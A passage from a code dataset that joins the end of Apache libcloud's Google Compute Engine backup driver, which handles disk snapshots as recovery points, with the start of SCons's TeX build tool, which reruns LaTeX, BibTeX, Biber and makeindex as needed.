BackupTargetJob, BackupTarget
from libcloud.backup.types import BackupTargetType, BackupTargetJobStatusType
from libcloud.common.google import GoogleResponse, GoogleBaseConnection
API_VERSION = 'v1'
DEFAULT_TASK_COMPLETION_TIMEOUT = 180
class GCEResponse(GoogleResponse):
pass
class GCEConnection(GoogleBaseConnection):
"""
Connection class for the GCE driver.
GCEConnection extends :class:`google.GoogleBaseConnection` for 2 reasons:
1. modify request_path for GCE URI.
2. Implement gce_params functionality described below.
If the parameter gce_params is set to a dict prior to calling request(),
the URL parameters will be updated to include those key/values FOR A
SINGLE REQUEST. If the response contains a nextPageToken,
gce_params['pageToken'] will be set to its value. This can be used to
implement paging in list:
>>> params, more_results = {'maxResults': 2}, True
>>> while more_results:
... driver.connection.gce_params=params
... driver.ex_list_urlmaps()
... more_results = 'pageToken' in params
...
[<GCEUrlMap id="..." name="cli-map">, <GCEUrlMap id="..." name="lc-map">]
[<GCEUrlMap id="..." name="web-map">]
"""
host = 'www.googleapis.com'
responseCls = GCEResponse
def __init__(self, user_id, key, secure, auth_type=None,
credential_file=None, project=None, **kwargs):
super(GCEConnection, self).__init__(user_id, key, secure=secure,
auth_type=auth_type,
credential_file=credential_file,
**kwargs)
self.request_path = '/compute/%s/projects/%s' % (API_VERSION,
project)
self.gce_params = None
def pre_connect_hook(self, params, headers):
"""
Update URL parameters with values from self.gce_params.
@inherits: :class:`GoogleBaseConnection.pre_connect_hook`
"""
params, headers = super(GCEConnection, self).pre_connect_hook(params,
headers)
if self.gce_params:
params.update(self.gce_params)
return params, headers
def request(self, *args, **kwargs):
"""
Perform request then do GCE-specific processing of URL params.
@inherits: :class:`GoogleBaseConnection.request`
"""
response = super(GCEConnection, self).request(*args, **kwargs)
# If gce_params has been set, then update the pageToken with the
# nextPageToken so it can be used in the next request.
if self.gce_params:
if 'nextPageToken' in response.object:
self.gce_params['pageToken'] = response.object['nextPageToken']
elif 'pageToken' in self.gce_params:
del self.gce_params['pageToken']
self.gce_params = None
return response
class GCEBackupDriver(BackupDriver):
name = 'Google Compute Engine Backup Driver'
website = 'http://cloud.google.com/'
connectionCls = GCEConnection
def __init__(self, user_id, key=None, project=None,
auth_type=None, scopes=None, credential_file=None, **kwargs):
"""
:param user_id: The email address (for service accounts) or Client ID
(for installed apps) to be used for authentication.
:type user_id: ``str``
:param key: The RSA Key (for service accounts) or file path containing
key or Client Secret (for installed apps) to be used for
authentication.
:type key: ``str``
:keyword project: Your GCE project name. (required)
:type project: ``str``
:keyword auth_type: Accepted values are "SA" or "IA" or "GCE"
("Service Account" or "Installed Application" or
"GCE" if libcloud is being used on a GCE instance
with service account enabled).
If not supplied, auth_type will be guessed based
on value of user_id or if the code is being
executed in a GCE instance.
:type auth_type: ``str``
:keyword scopes: List of authorization URLs. Default is empty and
grants read/write to Compute, Storage, DNS.
:type scopes: ``list``
:keyword credential_file: Path to file for caching authentication
information used by GCEConnection.
:type credential_file: ``str``
"""
if not project:
raise ValueError('Project name must be specified using '
'"project" keyword.')
self.auth_type = auth_type
self.project = project
self.scopes = scopes
self.credential_file = credential_file or \
'~/.gce_libcloud_auth' + '.' + self.project
super(GCEBackupDriver, self).__init__(user_id, key, **kwargs)
# Cache Zone and Region information to reduce API calls and
# increase speed
self.base_path = '/compute/%s/projects/%s' % (API_VERSION,
self.project)
def get_supported_target_types(self):
"""
Get a list of backup target types this driver supports
:return: ``list`` of :class:``BackupTargetType``
"""
return [BackupTargetType.VOLUME]
def list_targets(self):
"""
List all backuptargets
:rtype: ``list`` of :class:`BackupTarget`
"""
raise NotImplementedError(
'list_targets not implemented for this driver')
def create_target(self, name, address,
type=BackupTargetType.VOLUME, extra=None):
"""
Creates a new backup target
:param name: Name of the target
:type name: ``str``
:param address: The volume ID.
:type address: ``str``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
# Does nothing since any volume can be snapped at anytime.
return self.ex_get_target_by_source(address)
def create_target_from_node(self, node, type=BackupTargetType.VIRTUAL,
extra=None):
"""
Creates a new backup target from an existing node
:param node: The Node to backup
:type node: ``Node``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
# Get the first persistent disk
disks = node.extra['disks']
if disks is not None:
return self.create_target(
name=node.name,
address=disks[0]['source'],
type=BackupTargetType.VOLUME,
extra=None)
else:
raise RuntimeError("Node does not have any block devices")
def create_target_from_container(self, container,
type=BackupTargetType.OBJECT,
extra=None):
"""
Creates a new backup target from an existing storage container
:param node: The Container to backup
:type node: ``Container``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
raise NotImplementedError(
'create_target_from_container not implemented for this driver')
def update_target(self, target, name, address, extra):
"""
Update the properties of a backup target
:param target: Backup target to update
:type target: Instance of :class:`BackupTarget`
:param name: Name of the target
:type name: ``str``
:param address: Hostname, FQDN, IP, file path etc.
:type address: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
# Does nothing since any volume can be snapped at anytime.
return self.ex_get_target_by_source(address)
def delete_target(self, target):
"""
Delete a backup target
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget`
"""
raise NotImplementedError(
'delete_target not implemented for this driver')
def list_recovery_points(self, target, start_date=None, end_date=None):
"""
List the recovery points available for a target
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget`
:param start_date: The start date to show jobs between (optional)
:type start_date: :class:`datetime.datetime`
:param end_date: The end date to show jobs between (optional)
:type end_date: :class:`datetime.datetime``
:rtype: ``list`` of :class:`BackupTargetRecoveryPoint`
"""
request = '/global/snapshots'
response = self.connection.request(request, method='GET').object
return self._to_recovery_points(response, target)
def recover_target(self, target, recovery_point, path=None):
"""
Recover a backup target to a recovery point
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget`
:param recovery_point: Backup target with the backup data
:type recovery_point: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target not implemented for this driver')
def recover_target_out_of_place(self, target, recovery_point,
recovery_target, path=None):
"""
Recover a backup target to a recovery point out-of-place
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param recovery_point: Backup target with the backup data
:type recovery_point: Instance of :class:`BackupTarget`
:param recovery_target: Backup target with to recover the data to
:type recovery_target: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target_out_of_place not implemented for this driver')
def get_target_job(self, target, id):
"""
Get a specific backup job by ID
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param id: Backup target with the backup data
:type id: Instance of :class:`BackupTarget`
:rtype: :class:`BackupTargetJob`
"""
jobs = self.list_target_jobs(target)
return list(filter(lambda x: x.id == id, jobs))[0]
def list_target_jobs(self, target):
"""
List the backup jobs on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:rtype: ``list`` of :class:`BackupTargetJob`
"""
return []
def create_target_job(self, target, extra=None):
"""
Create a new backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTargetJob`
"""
name = target.name
request = '/zones/%s/disks/%s/createSnapshot' % (
target.extra['zone'].name, target.name)
snapshot_data = {
'source': target.extra['source']
}
self.connection.async_request(request, method='POST',
data=snapshot_data)
return self._to_job(self.ex_get_snapshot(name), target)
def resume_target_job(self, target, job):
"""
Resume a suspended backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to resume
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'resume_target_job not supported for this driver')
def suspend_target_job(self, target, job):
"""
Suspend a running backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to suspend
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'suspend_target_job not supported for this driver')
def cancel_target_job(self, target, job):
"""
Cancel a backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to cancel
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'cancel_target_job not supported for this driver')
def _to_recovery_points(self, data, target):
return [self._to_recovery_point(item, target)
for item in data.items]
def _to_recovery_point(self, item, target):
id = item.id
date = parse_date(item.creationTimestamp)
point = BackupTargetRecoveryPoint(
id=id,
date=date,
target=target,
driver=self.connection.driver,
extra={
'snapshot-id': id,
},
)
return point
def _to_jobs(self, data, target):
return [self._to_job(item, target)
for item in data.items]
def _to_job(self, item, target):
id = item.id
job = BackupTargetJob(
id=id,
status=BackupTargetJobStatusType.PENDING,
progress=0,
target=target,
driver=self.connection.driver,
extra={
},
)
return job
def ex_get_snapshot(self, name):
request = '/global/snapshots/%s' % (name)
response = self.connection.request(request, method='GET').object
return response
def ex_get_target_by_source(self, source):
return BackupTarget(
id=source,
name=source,
address=source,
type=BackupTargetType.VOLUME,
driver=self.connection.driver,
extra={
"source": source
}
)
| apache-2.0 | 3,948,166,087,562,766,000 | 34.16318 | 79 | 0.590612 | false |
Bforartists/scons | scons-local/SCons/Tool/tex.py | 3 | 40181 | """SCons.Tool.tex
Tool-specific initialization for TeX.
Generates .dvi files from .tex files
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/tex.py 2014/07/05 09:42:21 garyo"
import os.path
import re
import shutil
import sys
import platform
import glob
import SCons.Action
import SCons.Node
import SCons.Node.FS
import SCons.Util
import SCons.Scanner.LaTeX
Verbose = False
must_rerun_latex = True
# these are files that just need to be checked for changes and then rerun latex
check_suffixes = ['.toc', '.lof', '.lot', '.out', '.nav', '.snm']
# these are files that require bibtex or makeindex to be run when they change
all_suffixes = check_suffixes + ['.bbl', '.idx', '.nlo', '.glo', '.acn', '.bcf']
#
# regular expressions used to search for Latex features
# or outputs that require rerunning latex
#
# search for all .aux files opened by latex (recorded in the .fls file)
openout_aux_re = re.compile(r"OUTPUT *(.*\.aux)")
# search for all .bcf files opened by latex (recorded in the .fls file)
# for use by biber
openout_bcf_re = re.compile(r"OUTPUT *(.*\.bcf)")
#printindex_re = re.compile(r"^[^%]*\\printindex", re.MULTILINE)
#printnomenclature_re = re.compile(r"^[^%]*\\printnomenclature", re.MULTILINE)
#printglossary_re = re.compile(r"^[^%]*\\printglossary", re.MULTILINE)
# search to find rerun warnings
warning_rerun_str = '(^LaTeX Warning:.*Rerun)|(^Package \w+ Warning:.*Rerun)'
warning_rerun_re = re.compile(warning_rerun_str, re.MULTILINE)
# search to find citation rerun warnings
rerun_citations_str = "^LaTeX Warning:.*\n.*Rerun to get citations correct"
rerun_citations_re = re.compile(rerun_citations_str, re.MULTILINE)
# search to find undefined references or citations warnings
undefined_references_str = '(^LaTeX Warning:.*undefined references)|(^Package \w+ Warning:.*undefined citations)'
undefined_references_re = re.compile(undefined_references_str, re.MULTILINE)
# used by the emitter
auxfile_re = re.compile(r".", re.MULTILINE)
tableofcontents_re = re.compile(r"^[^%\n]*\\tableofcontents", re.MULTILINE)
makeindex_re = re.compile(r"^[^%\n]*\\makeindex", re.MULTILINE)
bibliography_re = re.compile(r"^[^%\n]*\\bibliography", re.MULTILINE)
bibunit_re = re.compile(r"^[^%\n]*\\begin\{bibunit\}", re.MULTILINE)
multibib_re = re.compile(r"^[^%\n]*\\newcites\{([^\}]*)\}", re.MULTILINE)
addbibresource_re = re.compile(r"^[^%\n]*\\(addbibresource|addglobalbib|addsectionbib)", re.MULTILINE)
listoffigures_re = re.compile(r"^[^%\n]*\\listoffigures", re.MULTILINE)
listoftables_re = re.compile(r"^[^%\n]*\\listoftables", re.MULTILINE)
hyperref_re = re.compile(r"^[^%\n]*\\usepackage.*\{hyperref\}", re.MULTILINE)
makenomenclature_re = re.compile(r"^[^%\n]*\\makenomenclature", re.MULTILINE)
makeglossary_re = re.compile(r"^[^%\n]*\\makeglossary", re.MULTILINE)
makeglossaries_re = re.compile(r"^[^%\n]*\\makeglossaries", re.MULTILINE)
makeacronyms_re = re.compile(r"^[^%\n]*\\makeglossaries", re.MULTILINE)
beamer_re = re.compile(r"^[^%\n]*\\documentclass\{beamer\}", re.MULTILINE)
regex = r'^[^%\n]*\\newglossary\s*\[([^\]]+)\]?\s*\{([^}]*)\}\s*\{([^}]*)\}\s*\{([^}]*)\}\s*\{([^}]*)\}'
newglossary_re = re.compile(regex, re.MULTILINE)
biblatex_re = re.compile(r"^[^%\n]*\\usepackage.*\{biblatex\}", re.MULTILINE)
newglossary_suffix = []
# search to find all files included by Latex
include_re = re.compile(r'^[^%\n]*\\(?:include|input){([^}]*)}', re.MULTILINE)
includeOnly_re = re.compile(r'^[^%\n]*\\(?:include){([^}]*)}', re.MULTILINE)
# search to find all graphics files included by Latex
includegraphics_re = re.compile(r'^[^%\n]*\\(?:includegraphics(?:\[[^\]]+\])?){([^}]*)}', re.MULTILINE)
# search to find all files opened by Latex (recorded in .log file)
openout_re = re.compile(r"OUTPUT *(.*)")
# list of graphics file extensions for TeX and LaTeX
TexGraphics = SCons.Scanner.LaTeX.TexGraphics
LatexGraphics = SCons.Scanner.LaTeX.LatexGraphics
# An Action sufficient to build any generic tex file.
TeXAction = None
# An action to build a latex file. This action might be needed more
# than once if we are dealing with labels and bibtex.
LaTeXAction = None
# An action to run BibTeX on a file.
BibTeXAction = None
# An action to run Biber on a file.
BiberAction = None
# An action to run MakeIndex on a file.
MakeIndexAction = None
# An action to run MakeIndex (for nomencl) on a file.
MakeNclAction = None
# An action to run MakeIndex (for glossary) on a file.
MakeGlossaryAction = None
# An action to run MakeIndex (for acronyms) on a file.
MakeAcronymsAction = None
# An action to run MakeIndex (for newglossary commands) on a file.
MakeNewGlossaryAction = None
# Used as a return value of modify_env_var if the variable is not set.
_null = SCons.Scanner.LaTeX._null
modify_env_var = SCons.Scanner.LaTeX.modify_env_var
def check_file_error_message(utility, filename='log'):
msg = '%s returned an error, check the %s file\n' % (utility, filename)
sys.stdout.write(msg)
def FindFile(name,suffixes,paths,env,requireExt=False):
if requireExt:
name,ext = SCons.Util.splitext(name)
# if the user gave an extension use it.
if ext:
name = name + ext
if Verbose:
print " searching for '%s' with extensions: " % name,suffixes
for path in paths:
testName = os.path.join(path,name)
if Verbose:
print " look for '%s'" % testName
if os.path.isfile(testName):
if Verbose:
print " found '%s'" % testName
return env.fs.File(testName)
else:
name_ext = SCons.Util.splitext(testName)[1]
if name_ext:
continue
# if no suffix try adding those passed in
for suffix in suffixes:
testNameExt = testName + suffix
if Verbose:
print " look for '%s'" % testNameExt
if os.path.isfile(testNameExt):
if Verbose:
print " found '%s'" % testNameExt
return env.fs.File(testNameExt)
if Verbose:
print " did not find '%s'" % name
return None
def InternalLaTeXAuxAction(XXXLaTeXAction, target = None, source= None, env=None):
"""A builder for LaTeX files that checks the output in the aux file
and decides how many times to use LaTeXAction, and BibTeXAction."""
global must_rerun_latex
# This routine is called with two actions. In this file for DVI builds
# with LaTeXAction and from the pdflatex.py with PDFLaTeXAction
# set this up now for the case where the user requests a different extension
# for the target filename
if (XXXLaTeXAction == LaTeXAction):
callerSuffix = ".dvi"
else:
callerSuffix = env['PDFSUFFIX']
basename = SCons.Util.splitext(str(source[0]))[0]
basedir = os.path.split(str(source[0]))[0]
basefile = os.path.split(str(basename))[1]
abspath = os.path.abspath(basedir)
targetext = os.path.splitext(str(target[0]))[1]
targetdir = os.path.split(str(target[0]))[0]
saved_env = {}
for var in SCons.Scanner.LaTeX.LaTeX.env_variables:
saved_env[var] = modify_env_var(env, var, abspath)
# Create base file names with the target directory since the auxiliary files
# will be made there. That's because the *COM variables have the cd
# command in the prolog. We check
# for the existence of files before opening them--even ones like the
# aux file that TeX always creates--to make it possible to write tests
# with stubs that don't necessarily generate all of the same files.
targetbase = os.path.join(targetdir, basefile)
# if there is a \makeindex there will be a .idx and thus
# we have to run makeindex at least once to keep the build
# happy even if there is no index.
# Same for glossaries, nomenclature, and acronyms
src_content = source[0].get_text_contents()
run_makeindex = makeindex_re.search(src_content) and not os.path.isfile(targetbase + '.idx')
run_nomenclature = makenomenclature_re.search(src_content) and not os.path.isfile(targetbase + '.nlo')
run_glossary = makeglossary_re.search(src_content) and not os.path.isfile(targetbase + '.glo')
run_glossaries = makeglossaries_re.search(src_content) and not os.path.isfile(targetbase + '.glo')
run_acronyms = makeacronyms_re.search(src_content) and not os.path.isfile(targetbase + '.acn')
saved_hashes = {}
suffix_nodes = {}
for suffix in all_suffixes+sum(newglossary_suffix, []):
theNode = env.fs.File(targetbase + suffix)
suffix_nodes[suffix] = theNode
saved_hashes[suffix] = theNode.get_csig()
if Verbose:
print "hashes: ",saved_hashes
must_rerun_latex = True
# .aux files already processed by BibTex
already_bibtexed = []
#
# routine to update MD5 hash and compare
#
def check_MD5(filenode, suffix):
global must_rerun_latex
# two calls to clear old csig
filenode.clear_memoized_values()
filenode.ninfo = filenode.new_ninfo()
new_md5 = filenode.get_csig()
if saved_hashes[suffix] == new_md5:
if Verbose:
print "file %s not changed" % (targetbase+suffix)
return False # unchanged
saved_hashes[suffix] = new_md5
must_rerun_latex = True
if Verbose:
print "file %s changed, rerunning Latex, new hash = " % (targetbase+suffix), new_md5
return True # changed
# generate the file name that latex will generate
resultfilename = targetbase + callerSuffix
count = 0
while (must_rerun_latex and count < int(env.subst('$LATEXRETRIES'))) :
result = XXXLaTeXAction(target, source, env)
if result != 0:
return result
count = count + 1
must_rerun_latex = False
# Decide if various things need to be run, or run again.
# Read the log file to find warnings/errors
logfilename = targetbase + '.log'
logContent = ''
if os.path.isfile(logfilename):
logContent = open(logfilename, "rb").read()
# Read the fls file to find all .aux files
flsfilename = targetbase + '.fls'
flsContent = ''
auxfiles = []
if os.path.isfile(flsfilename):
flsContent = open(flsfilename, "rb").read()
auxfiles = openout_aux_re.findall(flsContent)
# remove duplicates
dups = {}
for x in auxfiles:
dups[x] = 1
auxfiles = list(dups.keys())
bcffiles = []
if os.path.isfile(flsfilename):
flsContent = open(flsfilename, "rb").read()
bcffiles = openout_bcf_re.findall(flsContent)
# remove duplicates
dups = {}
for x in bcffiles:
dups[x] = 1
bcffiles = list(dups.keys())
if Verbose:
print "auxfiles ",auxfiles
print "bcffiles ",bcffiles
# Now decide if bibtex will need to be run.
# The information that bibtex reads from the .aux file is
# pass-independent. If we find (below) that the .bbl file is unchanged,
# then the last latex saw a correct bibliography.
# Therefore only do this once
# Go through all .aux files and remember the files already done.
for auxfilename in auxfiles:
if auxfilename not in already_bibtexed:
already_bibtexed.append(auxfilename)
target_aux = os.path.join(targetdir, auxfilename)
if os.path.isfile(target_aux):
content = open(target_aux, "rb").read()
if content.find("bibdata") != -1:
if Verbose:
print "Need to run bibtex on ",auxfilename
bibfile = env.fs.File(SCons.Util.splitext(target_aux)[0])
result = BibTeXAction(bibfile, bibfile, env)
if result != 0:
check_file_error_message(env['BIBTEX'], 'blg')
must_rerun_latex = True
# Now decide if biber will need to be run.
# When the backend for biblatex is biber (by choice or default) the
# citation information is put in the .bcf file.
# The information that biber reads from the .bcf file is
# pass-independent. If we find (below) that the .bbl file is unchanged,
# then the last latex saw a correct bibliography.
# Therefore only do this once
# Go through all .bcf files and remember the files already done.
for bcffilename in bcffiles:
if bcffilename not in already_bibtexed:
already_bibtexed.append(bcffilename)
target_bcf = os.path.join(targetdir, bcffilename)
if os.path.isfile(target_bcf):
content = open(target_bcf, "rb").read()
if content.find("bibdata") != -1:
if Verbose:
print "Need to run biber on ",bcffilename
bibfile = env.fs.File(SCons.Util.splitext(target_bcf)[0])
result = BiberAction(bibfile, bibfile, env)
if result != 0:
check_file_error_message(env['BIBER'], 'blg')
must_rerun_latex = True
# Now decide if latex will need to be run again due to index.
if check_MD5(suffix_nodes['.idx'],'.idx') or (count == 1 and run_makeindex):
# We must run makeindex
if Verbose:
print "Need to run makeindex"
idxfile = suffix_nodes['.idx']
result = MakeIndexAction(idxfile, idxfile, env)
if result != 0:
check_file_error_message(env['MAKEINDEX'], 'ilg')
return result
# TO-DO: need to add a way for the user to extend this list for whatever
# auxiliary files they create in other (or their own) packages
# Harder is case is where an action needs to be called -- that should be rare (I hope?)
for index in check_suffixes:
check_MD5(suffix_nodes[index],index)
# Now decide if latex will need to be run again due to nomenclature.
if check_MD5(suffix_nodes['.nlo'],'.nlo') or (count == 1 and run_nomenclature):
# We must run makeindex
if Verbose:
print "Need to run makeindex for nomenclature"
nclfile = suffix_nodes['.nlo']
result = MakeNclAction(nclfile, nclfile, env)
if result != 0:
check_file_error_message('%s (nomenclature)' % env['MAKENCL'],
'nlg')
#return result
# Now decide if latex will need to be run again due to glossary.
if check_MD5(suffix_nodes['.glo'],'.glo') or (count == 1 and run_glossaries) or (count == 1 and run_glossary):
# We must run makeindex
if Verbose:
print "Need to run makeindex for glossary"
glofile = suffix_nodes['.glo']
result = MakeGlossaryAction(glofile, glofile, env)
if result != 0:
check_file_error_message('%s (glossary)' % env['MAKEGLOSSARY'],
'glg')
#return result
# Now decide if latex will need to be run again due to acronyms.
if check_MD5(suffix_nodes['.acn'],'.acn') or (count == 1 and run_acronyms):
# We must run makeindex
if Verbose:
print "Need to run makeindex for acronyms"
acrfile = suffix_nodes['.acn']
result = MakeAcronymsAction(acrfile, acrfile, env)
if result != 0:
check_file_error_message('%s (acronyms)' % env['MAKEACRONYMS'],
'alg')
return result
# Now decide if latex will need to be run again due to newglossary command.
for ig in range(len(newglossary_suffix)):
if check_MD5(suffix_nodes[newglossary_suffix[ig][2]],newglossary_suffix[ig][2]) or (count == 1):
# We must run makeindex
if Verbose:
print "Need to run makeindex for newglossary"
newglfile = suffix_nodes[newglossary_suffix[ig][2]]
MakeNewGlossaryAction = SCons.Action.Action("$MAKENEWGLOSSARY ${SOURCE.filebase}%s -s ${SOURCE.filebase}.ist -t ${SOURCE.filebase}%s -o ${SOURCE.filebase}%s" % (newglossary_suffix[ig][2],newglossary_suffix[ig][0],newglossary_suffix[ig][1]), "$MAKENEWGLOSSARYCOMSTR")
result = MakeNewGlossaryAction(newglfile, newglfile, env)
if result != 0:
check_file_error_message('%s (newglossary)' % env['MAKENEWGLOSSARY'],
newglossary_suffix[ig][0])
return result
# Now decide if latex needs to be run yet again to resolve warnings.
if warning_rerun_re.search(logContent):
must_rerun_latex = True
if Verbose:
print "rerun Latex due to latex or package rerun warning"
if rerun_citations_re.search(logContent):
must_rerun_latex = True
if Verbose:
print "rerun Latex due to 'Rerun to get citations correct' warning"
if undefined_references_re.search(logContent):
must_rerun_latex = True
if Verbose:
print "rerun Latex due to undefined references or citations"
if (count >= int(env.subst('$LATEXRETRIES')) and must_rerun_latex):
print "reached max number of retries on Latex ,",int(env.subst('$LATEXRETRIES'))
# end of while loop
# rename Latex's output to what the target name is
if not (str(target[0]) == resultfilename and os.path.isfile(resultfilename)):
if os.path.isfile(resultfilename):
print "move %s to %s" % (resultfilename, str(target[0]), )
shutil.move(resultfilename,str(target[0]))
# Original comment (when TEXPICTS was not restored):
# The TEXPICTS enviroment variable is needed by a dvi -> pdf step
# later on Mac OSX so leave it
#
# It is also used when searching for pictures (implicit dependencies).
# Why not set the variable again in the respective builder instead
# of leaving local modifications in the environment? What if multiple
# latex builds in different directories need different TEXPICTS?
for var in SCons.Scanner.LaTeX.LaTeX.env_variables:
if var == 'TEXPICTS':
continue
if saved_env[var] is _null:
try:
del env['ENV'][var]
except KeyError:
pass # was never set
else:
env['ENV'][var] = saved_env[var]
return result
def LaTeXAuxAction(target = None, source= None, env=None):
result = InternalLaTeXAuxAction( LaTeXAction, target, source, env )
return result
LaTeX_re = re.compile("\\\\document(style|class)")
def is_LaTeX(flist,env,abspath):
"""Scan a file list to decide if it's TeX- or LaTeX-flavored."""
# We need to scan files that are included in case the
# \documentclass command is in them.
# get path list from both env['TEXINPUTS'] and env['ENV']['TEXINPUTS']
savedpath = modify_env_var(env, 'TEXINPUTS', abspath)
paths = env['ENV']['TEXINPUTS']
if SCons.Util.is_List(paths):
pass
else:
# Split at os.pathsep to convert into absolute path
paths = paths.split(os.pathsep)
# now that we have the path list restore the env
if savedpath is _null:
try:
del env['ENV']['TEXINPUTS']
except KeyError:
pass # was never set
else:
env['ENV']['TEXINPUTS'] = savedpath
if Verbose:
print "is_LaTeX search path ",paths
print "files to search :",flist
# Now that we have the search path and file list, check each one
for f in flist:
if Verbose:
print " checking for Latex source ",str(f)
content = f.get_text_contents()
if LaTeX_re.search(content):
if Verbose:
print "file %s is a LaTeX file" % str(f)
return 1
if Verbose:
print "file %s is not a LaTeX file" % str(f)
# now find included files
inc_files = [ ]
inc_files.extend( include_re.findall(content) )
if Verbose:
print "files included by '%s': "%str(f),inc_files
# inc_files is list of file names as given. need to find them
# using TEXINPUTS paths.
# search the included files
for src in inc_files:
srcNode = FindFile(src,['.tex','.ltx','.latex'],paths,env,requireExt=False)
# make this a list since is_LaTeX takes a list.
fileList = [srcNode,]
if Verbose:
print "FindFile found ",srcNode
if srcNode is not None:
file_test = is_LaTeX(fileList, env, abspath)
# return on first file that finds latex is needed.
if file_test:
return file_test
if Verbose:
print " done scanning ",str(f)
return 0
def TeXLaTeXFunction(target = None, source= None, env=None):
"""A builder for TeX and LaTeX that scans the source file to
decide the "flavor" of the source and then executes the appropriate
program."""
# find these paths for use in is_LaTeX to search for included files
basedir = os.path.split(str(source[0]))[0]
abspath = os.path.abspath(basedir)
if is_LaTeX(source,env,abspath):
result = LaTeXAuxAction(target,source,env)
if result != 0:
check_file_error_message(env['LATEX'])
else:
result = TeXAction(target,source,env)
if result != 0:
check_file_error_message(env['TEX'])
return result
def TeXLaTeXStrFunction(target = None, source= None, env=None):
"""A strfunction for TeX and LaTeX that scans the source file to
decide the "flavor" of the source and then returns the appropriate
command string."""
if env.GetOption("no_exec"):
# find these paths for use in is_LaTeX to search for included files
basedir = os.path.split(str(source[0]))[0]
abspath = os.path.abspath(basedir)
if is_LaTeX(source,env,abspath):
result = env.subst('$LATEXCOM',0,target,source)+" ..."
else:
result = env.subst("$TEXCOM",0,target,source)+" ..."
else:
result = ''
return result
def tex_eps_emitter(target, source, env):
"""An emitter for TeX and LaTeX sources when
executing tex or latex. It will accept .ps and .eps
graphics files
"""
(target, source) = tex_emitter_core(target, source, env, TexGraphics)
return (target, source)
def tex_pdf_emitter(target, source, env):
"""An emitter for TeX and LaTeX sources when
executing pdftex or pdflatex. It will accept graphics
files of types .pdf, .jpg, .png, .gif, and .tif
"""
(target, source) = tex_emitter_core(target, source, env, LatexGraphics)
return (target, source)
def ScanFiles(theFile, target, paths, file_tests, file_tests_search, env, graphics_extensions, targetdir, aux_files):
""" For theFile (a Node) update any file_tests and search for graphics files
then find all included files and call ScanFiles recursively for each of them"""
content = theFile.get_text_contents()
if Verbose:
print " scanning ",str(theFile)
for i in range(len(file_tests_search)):
if file_tests[i][0] is None:
if Verbose:
print "scan i ",i," files_tests[i] ",file_tests[i], file_tests[i][1]
file_tests[i][0] = file_tests_search[i].search(content)
if Verbose and file_tests[i][0]:
print " found match for ",file_tests[i][1][-1]
# for newglossary insert the suffixes in file_tests[i]
if file_tests[i][0] and file_tests[i][1][-1] == 'newglossary':
findresult = file_tests_search[i].findall(content)
for l in range(len(findresult)) :
(file_tests[i][1]).insert(0,'.'+findresult[l][3])
(file_tests[i][1]).insert(0,'.'+findresult[l][2])
(file_tests[i][1]).insert(0,'.'+findresult[l][0])
suffix_list = ['.'+findresult[l][0],'.'+findresult[l][2],'.'+findresult[l][3] ]
newglossary_suffix.append(suffix_list)
if Verbose:
print " new suffixes for newglossary ",newglossary_suffix
incResult = includeOnly_re.search(content)
if incResult:
aux_files.append(os.path.join(targetdir, incResult.group(1)))
if Verbose:
print "\include file names : ", aux_files
# recursively call this on each of the included files
inc_files = [ ]
inc_files.extend( include_re.findall(content) )
if Verbose:
print "files included by '%s': "%str(theFile),inc_files
# inc_files is list of file names as given. need to find them
# using TEXINPUTS paths.
for src in inc_files:
srcNode = FindFile(src,['.tex','.ltx','.latex'],paths,env,requireExt=False)
